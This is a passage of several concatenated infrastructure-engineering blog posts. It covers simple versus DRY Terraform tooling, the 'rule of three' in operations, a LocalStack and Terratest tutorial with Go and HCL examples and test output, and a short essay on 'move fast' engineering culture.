The pattern breaks down at truly massive scale, like 1000+ environments with complex interdependencies. At that point, you need more sophisticated tooling. But be honest: do you actually have that problem, or are you solving for imagined future scale?

Most teams adopt DRY tooling as “best practice” before hitting the scale where it provides value. They pay the complexity cost without reaping the benefits.

When to Use What: The Nuanced Reality

KISS Makes Sense When:

  You have fewer than 500 environments
  Team size is small to medium (< 50 engineers)
  Change frequency is low (infrastructure mostly stable after initial deployment)
  Operational clarity is critical (regulated industries, high-stakes infrastructure)
  Team has varied experience levels (sysadmins, not primarily developers)
  Troubleshooting speed matters more than code elegance


DRY Tooling Makes Sense When:

  You genuinely have massive scale (1000+ environments with interdependencies)
  Your team is primarily platform engineers comfortable with abstraction
  You have a dedicated platform team maintaining the tooling
  Environment configurations have complex shared logic that changes frequently
  You’re building infrastructure-as-a-product with many consumers
  Compliance requires enforced patterns across all deployments


The Real Question: What’s Your Actual Cost Metric?

If your cost metric is lines of code written, choose DRY.
If your cost metric is time to accomplish business goals, choose KISS.

Everything that increases time to business value (technical debt from abstraction, lengthy onboarding, opaque troubleshooting) is expensive regardless of how “clean” the code looks.

The Anti-Pattern: Engineering for Engineering’s Sake

The most dangerous trap in infrastructure work is falling in love with the tool or solution rather than the problem.

When teams spend months building sophisticated hierarchies with dynamic generation and complex inheritance models, they’re often solving for code aesthetics, not business needs. The infrastructure becomes the focus instead of what it enables.

Good infrastructure engineering is invisible. It lets other teams ship quickly without thinking about the underlying platforms. It doesn’t require specialized knowledge to make basic changes. It doesn’t become a bottleneck or a point of pride, it’s just there, working, quietly enabling the business.

This requires humility. The “clever” solution that demonstrates engineering prowess is often the wrong solution for the business. The “boring” solution that anyone can understand and modify is often right.

The Minimum Viable Architecture Principle

Start with what you need now. Build it simply. Make it modular so pieces can be replaced. Iterate and improve over time as actual needs emerge.

Don’t build for imagined future scale that may never materialize. Don’t adopt sophisticated tooling because it’s “best practice” if you don’t have the problems it solves. Don’t engineer abstractions that save lines of code but cost weeks of onboarding time.

Infrastructure is an auxiliary operation. Its job is to get out of the way and let the business move fast. Every layer of abstraction, every sophisticated pattern, every clever optimization should be justified by actual business impact—not engineering aesthetics.

Conclusion: Choose Boring Technology

After years of working with Infrastructure as Code at various scales, here’s what I’ve learned:

Orchestration complexity can’t be eliminated, it can only be relocated. The question is where to put it. For most teams, putting that complexity in observable, debuggable CI/CD pipelines beats putting it in abstraction frameworks and configuration hierarchies.

Terraform itself is powerful enough for most use cases. Most teams don’t need additional abstraction layers. Pure Terraform with thoughtful repo structure and pipeline orchestration handles moderate scale beautifully while keeping troubleshooting straightforward and onboarding fast.

There’s a place for sophisticated DRY tooling at massive scale with dedicated platform teams. But most teams aren’t there yet. They’re paying complexity costs for benefits they haven’t yet earned.

Choose boring technology. Keep it simple. Focus on business velocity over code elegance. Your 3 AM self will thank you.





Gang of Three: Pragmatic Operations Design Patterns

2025-10-23T00:00:00+00:00

This blog is dedicated to arcaven, who initially made me aware of this observation and opened my eyes to the wild world of infrastructure and system operations patterns at scale.

I Can’t Unsee It

A few weeks ago, something clicked. Maybe the shorter, winter-approaching days slowed me down enough to notice, but suddenly threes were everywhere. Why do we split environments into development, staging, and production? Why do we stage upgrades across three clusters? Why do we run hot, warm, and cold storage tiers? Why does our CI/CD pipeline have build and test, staging deployment, and production deployment gates?

The number three keeps showing up in systems work, and surprisingly few people talk about it explicitly. As it turns out, this pattern is not coincidence. It represents the intersection of distributed systems theory and practical operations experience. Once you start looking for it, you’ll find the rule of three embedded in nearly every mature infrastructure decision.

Where Consensus Algorithms Meet Change Management

Distributed systems run on quorum-based decision making. What that means is that a majority of nodes have to agree before committing state changes (see Paxos and Raft). These consensus algorithms are designed to handle node failures, communication delays, and network partitions while ensuring the system can continue making progress even when failures occur. With three nodes, you can lose one and still have two nodes available to form a majority. This gives you fault tolerance and forward progress in the same architectural package.

Two nodes cannot lose anything without risking deadlock or split-brain scenarios. A fourth node adds cost without adding tolerance, since a majority of four is three and the cluster still survives only one failure; it takes five nodes to survive two. Three is therefore the minimum viable number that actually delivers reliable consensus, and it is also practical from a cost and complexity perspective. This is why you see three-node clusters everywhere across the industry. This is not cargo culting or blind imitation; it is mathematics driving architecture.
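To make the majority arithmetic concrete, here is a minimal sketch of the calculation. The function names quorum and tolerated are my own, chosen for illustration, and are not taken from any particular consensus library.

```go
package main

import "fmt"

// quorum returns the smallest number of nodes that forms a strict majority.
func quorum(nodes int) int {
	return nodes/2 + 1
}

// tolerated returns how many nodes can fail while a majority is still reachable.
func tolerated(nodes int) int {
	return nodes - quorum(nodes)
}

func main() {
	for n := 1; n <= 5; n++ {
		fmt.Printf("nodes=%d quorum=%d tolerated failures=%d\n", n, quorum(n), tolerated(n))
	}
}
```

Running it shows that two nodes tolerate zero failures, three and four both tolerate one, and five tolerate two, which is why even-sized clusters rarely pay for themselves.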

The same logic drives traditional thinking around redundancy planning. Three instances means one for baseline capacity, one available during maintenance windows, and one ready for the surprise failure at 3am. Load balancers, database replicas, and availability zones all follow this pattern because it maps cleanly to how systems actually fail in production environments.

This pattern also extends to monitoring and alerting systems. Three data points allow you to establish a trend and distinguish between noise and signal. A single metric spike might be nothing, two consecutive spikes suggest investigation, but three consecutive anomalies typically trigger automated responses or pages. The threshold of three provides enough confidence to act without creating alert fatigue from false positives.
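As a rough sketch of that escalation rule, the snippet below counts how many of the most recent samples breach a threshold and maps the count to an action. The names consecutiveBreaches and action, the sample values, and the threshold of 400 are all hypothetical; real alerting systems express this in their own rule languages.

```go
package main

import "fmt"

// consecutiveBreaches counts how many of the most recent samples,
// walking backwards from the newest, exceed the threshold.
func consecutiveBreaches(samples []float64, threshold float64) int {
	count := 0
	for i := len(samples) - 1; i >= 0 && samples[i] > threshold; i-- {
		count++
	}
	return count
}

// action maps a breach count to the escalation described above:
// one spike is ignored, two prompt investigation, three or more page.
func action(breaches int) string {
	switch {
	case breaches >= 3:
		return "page"
	case breaches == 2:
		return "investigate"
	default:
		return "ignore"
	}
}

func main() {
	latencies := []float64{120, 480, 510, 530} // hypothetical p99 latencies in ms
	n := consecutiveBreaches(latencies, 400)
	fmt.Println(n, action(n)) // prints "3 page"
}
```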

AWS Best Practices and Chaos Engineering

AWS regions typically ship with three or more availability zones, and the Well-Architected Framework encourages spreading workloads across them. This is not just resilience theater or checkbox compliance. It embodies that same quorum mathematics we discussed earlier. Lose one availability zone and your system continues running with consensus intact. Your application remains available, your data stays consistent, and your customers notice nothing.

Chaos engineering practices naturally gravitate toward threes as well. Kill one instance and observe what happens. You are testing real failure modes while keeping two healthy nodes as a safety net. This allows destructive testing that does not actually destroy your service. You gain confidence in your resilience mechanisms without risking a full outage. Tools like Chaos Monkey and Gremlin are built around this philosophy of controlled, incremental failure injection.

Rolling deployments across three clusters provide a built-in verification pattern that works remarkably well in practice. Deploy to the first cluster, verify correct behavior, then proceed to the second. Verify again, then move to the third. These two checkpoints before full rollout give you opportunities to catch unusual issues before they propagate everywhere. Your first cluster serves as your canary, detecting problems early. Your second cluster provides a confidence check that the issue was not environment-specific. Your third cluster represents your validated rollout to the remainder of your infrastructure.
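The deploy, verify, proceed loop can be sketched in a few lines. This is an illustration under assumptions, not a real deployment tool: rollout, errUnhealthy, and the cluster names are hypothetical, and the deploy and verify callbacks stand in for whatever your pipeline actually runs.

```go
package main

import (
	"errors"
	"fmt"
)

// errUnhealthy is a placeholder verification failure used in the demo below.
var errUnhealthy = errors.New("error rate above baseline")

// rollout deploys to each cluster in order and verifies it before moving on.
// It stops at the first failure and returns the clusters that completed.
func rollout(clusters []string, deploy, verify func(cluster string) error) ([]string, error) {
	var done []string
	for _, c := range clusters {
		if err := deploy(c); err != nil {
			return done, fmt.Errorf("deploy to %s: %w", c, err)
		}
		if err := verify(c); err != nil {
			return done, fmt.Errorf("verify %s: %w", c, err)
		}
		done = append(done, c)
	}
	return done, nil
}

func main() {
	clusters := []string{"cluster-a", "cluster-b", "cluster-c"}
	deploy := func(string) error { return nil }
	// Simulate the second checkpoint catching a problem.
	verify := func(c string) error {
		if c == "cluster-b" {
			return errUnhealthy
		}
		return nil
	}
	done, err := rollout(clusters, deploy, verify)
	fmt.Println(done, err)
}
```

In this run the rollout halts at the second checkpoint, so the third cluster never receives the change.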

Storage Hierarchies and Performance Tiers

Storage systems provide another compelling example of the rule of three in action. Hot storage serves frequently accessed data with low latency. Warm storage holds less frequently accessed data at moderate cost and performance. Cold storage archives rarely accessed data at minimal cost. This three-tier architecture balances performance requirements against budget constraints while providing clear migration paths as data ages.

Cloud providers have built entire product lines around this model. Amazon S3 offers Standard, Infrequent Access, and Glacier tiers. Azure provides Hot, Cool, and Archive tiers. Google Cloud offers Standard, Nearline, and Coldline storage classes. The consistency across providers suggests this is not arbitrary product segmentation but rather a natural reflection of how organizations actually use data over time.

Database systems follow similar patterns. Many databases implement a three-level caching strategy with L1 cache in memory, L2 cache on fast local storage, and L3 representing the authoritative data on persistent storage. Each level trades off speed for capacity and durability. This hierarchy allows databases to serve most queries from fast cache while maintaining data integrity through persistent storage.

The Practical Value of Three

Understanding why three works so well helps us make better infrastructure decisions. When designing a new system, starting with three of anything gives you a resilient foundation without over-engineering. Three availability zones, three environment tiers, three deployment stages, three monitoring thresholds. Each application of the pattern provides fault tolerance, verification opportunities, and practical operability.

This does not mean three is always the right answer. Some systems genuinely need more redundancy or more granular staging. However, three serves as an excellent default that you should consciously decide to deviate from rather than accidentally under-provision. If you find yourself choosing two of something, ask whether you are accepting unnecessary fragility. If you are choosing five, ask whether the additional complexity provides proportional value.

Thanks for reading, and if you like this blog, you might like the code and tools on my GitHub.


Testing IaC with the TerraStack
2025-08-15T00:00:00+00:00
Context

You write a Terraform module, parameterize the inputs, add some advanced settings, and push your PR. You’re 76% confident it works as intended. Most configuration looks solid, but a few settings could go either way when your apply pipeline runs. You’ve heard about test-driven development, seen test directories in popular open source Terraform modules with some obscure Go code, but you’re not sure how it all fits together. On top of that, you don’t have a dedicated test account for deploying test resources, and spinning up real AWS infrastructure just to test some simple configurations feels like overkill.

I’ve seen this scenario a lot, so I took a crack at a solution. Testing Infrastructure as Code has always been a bit of a pain point with limited options. Lots of cross your fingers and hope, manual testing in dev accounts, unit testing with mocks that miss actual cloud provider interactions, or expensive integration testing with real resources (that become orphaned and require aws-nuke… different story for another blog). What we really need is something that gives us confidence without the overhead, cost, or complexity of managing separate test infrastructure.

Building the TerraStack

I built yet another Go package to ease some of the pain of testing Infrastructure as Code (IaC). If you don’t have a dedicated test account, can’t predict how your configurations will hold up when they actually hit the API, and want one consistent way to test locally and in CI/CD pipelines, this library can help. The go-localstack package combines the power of LocalStack (a fully functional local AWS cloud stack) with Terratest’s battle-tested testing framework. I jokingly call this duo the TerraStack (please don’t sue me, company that builds geospatial products that enable smarter land asset management and development).

Anyway, LocalStack spins up a containerized environment that mimics AWS services locally. No real resources, no surprise bills, no cleanup headaches. Your Terraform code thinks it’s talking to real AWS, but it’s actually hitting LocalStack’s emulated services running in Docker. This approach solves several pain points at once: feedback loops are fast, with tests running in seconds rather than minutes; everything runs in containers, so it drops into CI/CD easily; tests exercise real API interactions, unlike unit tests with mocks; and cleanup is automatic when the container dies.

Setting Up Your Test Environment

Let’s walk through a basic example that tests an S3 bucket configuration. You’ll need a basic Terraform configuration and a Go test file to get started. Here’s a simple configuration that creates an S3 bucket with some tags:

test.tf:

# An example Terraform configuration (stolen from provider docs) for provisioning an S3 bucket with LocalStack
resource "aws_s3_bucket" "example" {
  bucket = "my-tf-test-bucket"

  tags = {
    Name        = "My bucket"
    Environment = "Dev"
  }
}


For the provider configuration, you have two options. The first approach requires configuring the AWS provider to point directly to LocalStack endpoints. Notice how we’re pointing the AWS provider endpoints to LocalStack instead of real AWS, using dummy credentials since LocalStack doesn’t authenticate, and setting default tags to help identify resources created during testing:

providers.tf:

provider "aws" {
  region                      = "us-east-1"
  access_key                  = "test"
  secret_key                  = "test"
  s3_use_path_style           = false
  skip_credentials_validation = true
  skip_metadata_api_check     = true
  skip_requesting_account_id  = true

  endpoints {
    s3  = "http://s3.localhost.localstack.cloud:4566"
    sts = "http://localhost:4566"
  }

  default_tags {
    tags = {
      Environment = "Local"
      Service     = "LocalStack"
    }
  }
}


Alternatively, you can skip the provider configuration entirely by using the tflocal binary instead of terraform. This is LocalStack’s wrapper around Terraform that automatically configures all the necessary provider settings. To use this approach, install the wrapper in your test environment with pip install terraform-local, then set the TerraformBinary option in your Terratest configuration to tflocal. This simplifies your setup significantly since you don’t need to manage provider endpoint configurations, but it does add a Python dependency to your test environment.
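If some machines have tflocal installed and others don’t, one option is to pick the binary at test time. The sketch below is only an illustration: hasBinary and pickTerraformBinary are hypothetical helpers of mine, not part of Terratest or go-localstack, and the fallback to plain terraform assumes your providers.tf already points at LocalStack.

```go
package main

import (
	"fmt"
	"os/exec"
)

// hasBinary reports whether name resolves to an executable on PATH.
func hasBinary(name string) bool {
	_, err := exec.LookPath(name)
	return err == nil
}

// pickTerraformBinary prefers the tflocal wrapper when it is available
// and falls back to plain terraform otherwise.
func pickTerraformBinary(has func(name string) bool) string {
	if has("tflocal") {
		return "tflocal"
	}
	return "terraform"
}

func main() {
	binary := pickTerraformBinary(hasBinary)
	// In a Terratest test, this value would be assigned to the
	// TerraformBinary field of terraform.Options.
	fmt.Println("using Terraform binary:", binary)
}
```

Passing the lookup in as a function keeps the choice easy to exercise in a unit test without touching the real PATH.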

Writing Comprehensive Tests

The Go test is where go-localstack shines by abstracting away the container management complexity. Here’s a basic test that demonstrates the core functionality:

s3_bucket_test.go:

package main

import (
	"context"
	"testing"

	"github.com/R0seSecurity/go-localstack/localstack"
	"github.com/docker/docker/client"
	"github.com/gruntwork-io/terratest/modules/terraform"
	"github.com/stretchr/testify/assert"
	"github.com/stretchr/testify/require"
)

func TestS3BucketWithLocalStack(t *testing.T) {
	t.Parallel()

	ctx := context.Background()

	// Create a Docker client; require stops the test immediately if setup fails,
	// so later steps never run against a nil client or runner
	cli, err := client.NewClientWithOpts(client.FromEnv, client.WithAPIVersionNegotiation())
	require.NoError(t, err)
	defer func() { _ = cli.Close() }()

	// Start LocalStack container
	runner, err := localstack.NewRunner(cli)
	require.NoError(t, err)

	containerID, err := runner.Start(ctx)
	require.NoError(t, err)
	assert.NotEmpty(t, containerID)

	// Run Terratest with Terraform options
	tfOptions := &terraform.Options{
		TerraformDir: ".",
		Upgrade:      true,
	}

	defer terraform.Destroy(t, tfOptions)
	terraform.InitAndApply(t, tfOptions)
}


This basic test spins up a LocalStack container using Docker, configures Terratest to run Terraform commands against our configuration, runs terraform init and terraform apply, and automatically runs terraform destroy when the test completes thanks to the defer statement. The entire test cycle from container startup to resource creation and cleanup takes just under 11 seconds, which is pretty impressive for a full integration test.

Advanced Testing Scenarios

You can extend this approach significantly beyond basic resource creation. For more comprehensive validation, you can use Terratest’s built-in assertion functions and the AWS SDK to verify that resources were created with the correct properties. A simple first step is to validate that your S3 bucket name is exposed as an output with the expected value.

Start by adding an output to your Terraform configuration:

output "bucket_name" {
  description = "The name of the S3 bucket"
  value       = aws_s3_bucket.example.bucket
}


Then read the output in your test and assert on its value:

// After terraform apply, validate the bucket was created correctly
bucketName := terraform.Output(t, tfOptions, "bucket_name")
assert.Equal(t, "my-tf-test-bucket", bucketName)


Using Test Fixtures and Variables

For testing modules with different configurations, you can leverage Terratest’s support for variable files and fixtures. Create a fixtures directory with different .tfvars files for various test scenarios:

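// Requires "fmt" and a uuid package (assumed here to be "github.com/google/uuid") in the import block
tfOptions := &terraform.Options{
    TerraformDir: "./fixtures/basic-bucket",
    VarFiles:     []string{"test.tfvars"},
    Vars: map[string]interface{}{
        // A unique suffix keeps parallel tests from colliding on the bucket name
        "bucket_name": fmt.Sprintf("test-bucket-%s", uuid.New().String()),
        "environment": "test",
    },
}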


This approach allows you to test the same module with different input combinations, ensuring your module handles edge cases correctly. You can create separate test functions for different scenarios - basic functionality, advanced configurations, error conditions, and variable validation. For example, you might have TestBasicS3Bucket, TestS3BucketWithEncryption, TestS3BucketWithInvalidName to cover various use cases.
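One way to organize those scenarios is a table of inputs and expected outcomes. The sketch below shows only the shape of the idea: scenario, applyFunc, runScenarios, and fakeApply are hypothetical names of mine, and fakeApply is a stub that stands in for a real call such as Terratest’s terraform.InitAndApplyE. Its uppercase check is a placeholder, not how Terraform or AWS actually validates bucket names.

```go
package main

import (
	"errors"
	"fmt"
	"strings"
)

// scenario describes one set of module inputs and whether apply should fail.
type scenario struct {
	name    string
	vars    map[string]interface{}
	wantErr bool
}

// applyFunc stands in for a function that applies the module with the given variables.
type applyFunc func(vars map[string]interface{}) error

// runScenarios applies every scenario and returns the names of those
// whose outcome did not match the expectation.
func runScenarios(scenarios []scenario, apply applyFunc) []string {
	var failed []string
	for _, s := range scenarios {
		err := apply(s.vars)
		if (err != nil) != s.wantErr {
			failed = append(failed, s.name)
		}
	}
	return failed
}

var errInvalidName = errors.New("invalid bucket name")

// fakeApply is a stub for illustration: it rejects names containing uppercase letters.
func fakeApply(vars map[string]interface{}) error {
	name, _ := vars["bucket_name"].(string)
	if name != strings.ToLower(name) {
		return errInvalidName
	}
	return nil
}

func main() {
	scenarios := []scenario{
		{name: "basic", vars: map[string]interface{}{"bucket_name": "test-bucket"}, wantErr: false},
		{name: "invalid-name", vars: map[string]interface{}{"bucket_name": "Test_Bucket"}, wantErr: true},
	}
	fmt.Println("unexpected outcomes:", runScenarios(scenarios, fakeApply))
}
```

In a real test file each row would typically become a t.Run subtest, so failures are reported per scenario.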

Testing Multi-Resource Stacks

The real power of this approach becomes evident when testing entire stacks of interconnected resources. You can test complete environments with VPCs, subnets, security groups, and EC2 instances all running against LocalStack. The container automatically handles service discovery and networking between different AWS services, so your Lambda functions can actually invoke other services, your EC2 instances can write to S3 buckets, and your API Gateway can trigger the right backend services. Keep in mind that the providers.tf shown earlier only overrides the s3 and sts endpoints; a multi-service stack needs an endpoint entry for every service it touches (or the tflocal wrapper), and LocalStack’s coverage varies by service.

Error condition testing is equally valuable - intentionally break configurations to ensure your modules fail gracefully and provide helpful error messages. This helps catch issues before they hit production and ensures your error handling is robust.

Running Your Tests

With everything in place, run go test -v ./... to execute your tests. The output shows what’s happening during the test execution, including container startup, Terraform planning and applying, resource creation, and cleanup. The combination of LocalStack’s AWS emulation and Terratest’s testing framework gives you confidence that your infrastructure code works without the operational overhead of managing test accounts or worrying about resource cleanup.

Test output:

❯ go test -v ./...
=== RUN   TestS3BucketWithLocalStack
{"status":"Pulling from localstack/localstack","id":"latest"}
TestS3BucketWithLocalStack 2025-08-15T12:19:29-04:00 retry.go:91: terraform [init -upgrade=true]
TestS3BucketWithLocalStack 2025-08-15T12:19:29-04:00 logger.go:67: Running command terraform with args [init -upgrade=true]
TestS3BucketWithLocalStack 2025-08-15T12:19:29-04:00 logger.go:67: Initializing the backend...
TestS3BucketWithLocalStack 2025-08-15T12:19:30-04:00 logger.go:67: Initializing provider plugins...
TestS3BucketWithLocalStack 2025-08-15T12:19:30-04:00 logger.go:67: - Finding latest version of hashicorp/aws...
TestS3BucketWithLocalStack 2025-08-15T12:19:30-04:00 logger.go:67: - Using previously-installed hashicorp/aws v6.9.0
TestS3BucketWithLocalStack 2025-08-15T12:19:30-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67: Terraform will perform the following actions:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:   # aws_s3_bucket.example will be created
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:   + resource "aws_s3_bucket" "example" {
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + acceleration_status         = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + acl                         = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + arn                         = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + bucket                      = "my-tf-test-bucket"
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + bucket_domain_name          = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + bucket_prefix               = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + bucket_region               = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + bucket_regional_domain_name = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + force_destroy               = false
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + hosted_zone_id              = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + id                          = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + object_lock_enabled         = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + policy                      = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + region                      = "us-east-1"
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + request_payer               = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + tags                        = {
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:           + "Environment" = "Dev"
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:           + "Name"        = "My bucket"
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:         }
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + tags_all                    = {
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:           + "Environment" = "Dev"
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:           + "Name"        = "My bucket"
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:           + "Service"     = "LocalStack"
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:         }
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + website_domain              = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + website_endpoint            = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + cors_rule (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + grant (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + lifecycle_rule (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + logging (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + object_lock_configuration (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + replication_configuration (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + server_side_encryption_configuration (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + versioning (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + website (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:     }
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67: Plan: 1 to add, 0 to change, 0 to destroy.
TestS3BucketWithLocalStack 2025-08-15T12:19:34-04:00 logger.go:67: aws_s3_bucket.example: Creating...
TestS3BucketWithLocalStack 2025-08-15T12:19:35-04:00 logger.go:67: aws_s3_bucket.example: Creation complete after 0s [id=my-tf-test-bucket]
TestS3BucketWithLocalStack 2025-08-15T12:19:35-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:35-04:00 logger.go:67: Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
TestS3BucketWithLocalStack 2025-08-15T12:19:35-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:35-04:00 retry.go:91: terraform [destroy -auto-approve -input=false -lock=false]
TestS3BucketWithLocalStack 2025-08-15T12:19:35-04:00 logger.go:67: Running command terraform with args [destroy -auto-approve -input=false -lock=false]
TestS3BucketWithLocalStack 2025-08-15T12:19:38-04:00 logger.go:67: Plan: 0 to add, 0 to change, 1 to destroy.
TestS3BucketWithLocalStack 2025-08-15T12:19:39-04:00 logger.go:67: aws_s3_bucket.example: Destroying... [id=my-tf-test-bucket]
TestS3BucketWithLocalStack 2025-08-15T12:19:39-04:00 logger.go:67: aws_s3_bucket.example: Destruction complete after 0s

--- PASS: TestS3BucketWithLocalStack (10.83s)


I hope this gives you a solid foundation for testing your Terraform modules with the TerraStack. By leveraging LocalStack and Terratest, you can create fast, reliable tests that run locally or in CI/CD pipelines without the overhead of managing real AWS resources. This approach not only speeds up your development cycle but also gives you confidence that your IaC works as intended before it hits production. Happy testing! If you’re interested in more of my work, check out my GitHub.


Rushing Toward Rewrite
2025-03-26T00:00:00+00:00
This is part three of my microblog series exploring the subtle dysfunctions that plague engineering organizations. After discussing over-abstraction as a liability and unpacking how excessive toil kills engineering teams, this post tackles a nuanced threat: when “moving fast” becomes a cultural shortcut for cutting corners.

Move Fast and Don’t Break Everything

A former CEO of mine used to say: “Be fast or be perfect. And since no one’s perfect, you better be fast.” Sounds cool until that motto becomes a shield to skip due diligence, code reviews, and even basic security hygiene. Speed wasn’t a value—it was an excuse. PRs rushed. On-call flaring. Postmortems piling. And still, engineers asking for admin access “to move fast.”

Spoiler: they didn’t need it.

The deeper problem? We weren’t a scrappy startup anymore—we were operating at enterprise scale with a startup mindset. The cost of speed was technical debt, fragility, and a long tail of rework. When I transitioned to a new role (back in startup mode) I heard the same “move fast” mantra. But this time, it hit differently. Because here’s the truth: moving fast is possible without setting your future self on fire.

Here’s what I’ve learned:

1. Fail fast—but fail forward. Don’t just throw things at prod and hope they stick. Structure your failures. If a solution’s not viable, surface that early with data and a path forward. Good failure leaves breadcrumbs for the next iteration.

2. Build for iteration. Forget perfect. Aim for clear next steps. Your v1 should be designed with a roadmap in mind. Where will this evolve? What trade-offs are you making? Ship it—but know how you’ll ship it better.

3. Stay modular. Design with exits. If your observability pipeline starts with a pricey SaaS, fine. But make it swappable. Keep your vendor coupling thin so you can self-host later without a complete rewrite.

4. Be honest about scale. What worked for a team of 10 won’t work at 100. “Move fast” looks different when customers depend on your uptime. Match your velocity with the blast radius of your decisions.

We glamorize speed, but the smartest teams know when to slow down, breathe, and make thoughtful decisions that stand the test of time. Move fast—but don’t break the foundation.
